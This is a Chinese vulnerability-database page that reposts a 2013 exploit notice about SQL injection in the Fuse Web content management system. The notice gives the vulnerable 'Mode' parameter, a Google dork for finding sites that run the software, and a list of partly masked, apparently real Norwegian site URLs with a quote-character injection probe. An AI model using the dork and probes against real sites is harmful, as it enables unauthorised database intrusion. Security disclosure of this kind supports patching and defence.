Fuse Web SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044475 漏洞类型
发布时间 2013-09-15 更新时间 2013-09-15
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013090113
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
 |-------------------------------------------------------------------------|
 | [*] Exploit Title: Fuse Web SQL Injection
 |
 | [*] Exploit Author: Ashiyane Digital Security Team
 |
 | [*] Software Link : http://www.fuse.no
 |
 | [*] Google Dork: intext:"Powered by Fuse Web"
 |
 | [*] Tested on: Windows,Linux
 |
 | [*] Date : 2013/09/14
 |-------------------------------------------------------------------------|
 | [*] Exploit 1 : Sql Injection
 | [*] Location : [Target]/?HovedMenyId=&InnholdMenyId=&Mode=[Sql Injection]
 |
 | [*] Proof:
 |
 | [*] http://www.bjXom/?HovedMenyId=&InnholdMenyId=&Mode='
 |
 | [*] http://www.X/?HovedMenyId=&InnholdMenyId=&Mode='
 |
 | [*] http://wX/?HovedMenyId=&InnholdMenyId=&Mode='
 |
 | [*] http://wwX/?HovedMenyId=&InnholdMenyId=&Mode='
 |
 | [*] http://wwXno/?HovedMenyId=&InnholdMenyId=&Mode='
 |
 | [*] http://X.no/?HovedMenyId=&InnholdMenyId=&Mode='
 |
 | [*] http://wwXno/?HovedMenyId=&InnholdMenyId=&Mode='
 |
 | [*] http://wwXning.no/?HovedMenyId=&InnholdMenyId=&Mode='
 |
 | [*] http://stabbuXkk.no/?HovedMenyId=&InnholdMenyId=&Mode='
 |
 | [*] http://www.romXXaard.no/?HovedMenyId=&InnholdMenyId=&Mode='
 |-------------------------------------------------------------------------|
 | [*] Discovered By : ACC3SS
 |-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|